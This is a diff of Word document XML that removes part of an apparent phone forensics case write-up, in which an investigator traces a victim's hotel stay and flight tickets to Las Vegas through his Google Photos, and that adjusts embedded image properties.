-        <w:t>hotel</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>lobby</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve">. </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>She</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>informed</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> him </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>that</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> the </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>victim</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>had</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>reserved</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> the </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>room</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>for</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> 10 </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>days</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>and</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>had</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> a </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>flight</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>scheduled</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>thereafter</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve">. The </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>investigator</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>believes</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>that</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> the </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>victim</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> may </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>have</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>stored</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>his</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>ticket</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>information</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>on</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>his</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>phone</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve">. </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>Look</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>for</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>where</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> the </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>victim</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>intended</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> to </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>travel</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="39"/>
-        </w:numPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Kiểm tra trong </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>google</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>Photo</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> của nạn nhân thấy rất nhiều hình ảnh </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve">về vé của nạn nhân mà điểm đến là ở </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>Las</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>vegas</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2FEA1F30" wp14:editId="5C183BD7">
-            <wp:extent cx="5943600" cy="2922905"/>
-            <wp:effectExtent l="0" t="0" r="0" b="0"/>
-            <wp:docPr id="907776246" name="Picture 1"/>
-            <wp:cNvGraphicFramePr>
-              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
-            </wp:cNvGraphicFramePr>
-            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
-              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                  <pic:nvPicPr>
-                    <pic:cNvPr id="907776246" name=""/>
-                    <pic:cNvPicPr/>
-                  </pic:nvPicPr>
-                  <pic:blipFill>
-                    <a:blip r:embed="rId11"/>
-                    <a:stretch>
-                      <a:fillRect/>
-                    </a:stretch>
-                  </pic:blipFill>
-                  <pic:spPr>
-                    <a:xfrm>
-                      <a:off x="0" y="0"/>
-                      <a:ext cx="5943600" cy="2922905"/>
-                    </a:xfrm>
-                    <a:prstGeom prst="rect">
-                      <a:avLst/>
-                    </a:prstGeom>
-                  </pic:spPr>
-                </pic:pic>
-              </a:graphicData>
-            </a:graphic>
-          </wp:inline>
-        </w:drawing>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="347BEFF7" wp14:editId="54D6F6D3">
-            <wp:extent cx="5943600" cy="1924050"/>
-            <wp:effectExtent l="0" t="0" r="0" b="0"/>
-            <wp:docPr id="1856599448" name="Picture 1"/>
-            <wp:cNvGraphicFramePr>
-              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
-            </wp:cNvGraphicFramePr>
-            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
-              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                  <pic:nvPicPr>
-                    <pic:cNvPr id="1856599448" name=""/>
+                    <pic:cNvPr id="645027031" name=""/>
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
@@ -4436,7 +2955,7 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="5943600" cy="1924050"/>
+                      <a:ext cx="5943600" cy="2850515"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -4448,24 +2967,52 @@
           </wp:inline>
         </w:drawing>
       </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
+          <w:vanish/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:vanish/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Top of Form</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
